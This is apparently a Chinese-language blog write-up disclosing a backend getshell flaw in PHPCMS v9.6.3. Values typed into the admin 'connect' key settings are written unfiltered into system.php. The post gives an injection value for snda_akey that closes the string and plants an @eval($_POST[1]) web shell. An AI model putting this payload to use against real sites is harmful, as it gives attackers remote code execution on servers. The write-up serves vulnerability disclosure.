PHPCMSV9.6.3 后台GETSHELL

好大一条虫 407 次浏览 0

关于PHPCMSV9

phpcms是一个优秀的php网站管理系统,php内容管理系统,php新闻系统,php新闻发布系统,php文章系统,php文章管理系统。
那么今天我在看看PHPCMS有没有更新的时候,主站已经无法访问了。

环境

LOCALHOST
PHPSTUDY NGINX PHP5.3 mysql5.5
源码在源码之家下载的phpcmsV9.6.3 utf8
PHPCMSV9.6.3 后台GETSHELL

漏洞披露

进入后台->基本设置->connect
PHPCMSV9.6.3 后台GETSHELL

以上不管是哪一个KEY设置的地方均可以写入任意的字符到配置文件中

找到\www\phpcms\caches\configs\system.php

'connect_enable' => '1',	//是否开启外部通行证
'sina_akey' => '',	//sina AKEY
'sina_skey' => '',	//sina SKEY

'snda_akey' => '',	//盛大通行证 akey
'snda_skey' => '',	//盛大通行证 skey

'qq_akey' => '',	//qq skey
'qq_skey' => '',	//qq skey

'qq_appkey' => '',	//QQ号码登录 appkey
'qq_appid' => '',	//QQ号码登录 appid
'qq_callback' => '',	//QQ号码登录 callback

'admin_url' => '',	//允许访问后台的域名

闭合

'snda_akey' => '\\',@@eval($_POST[1]),//',	//盛大通行证 akey

PHPCMSV9.6.3 后台GETSHELL

发表评论 取消回复
表情 图片 链接 代码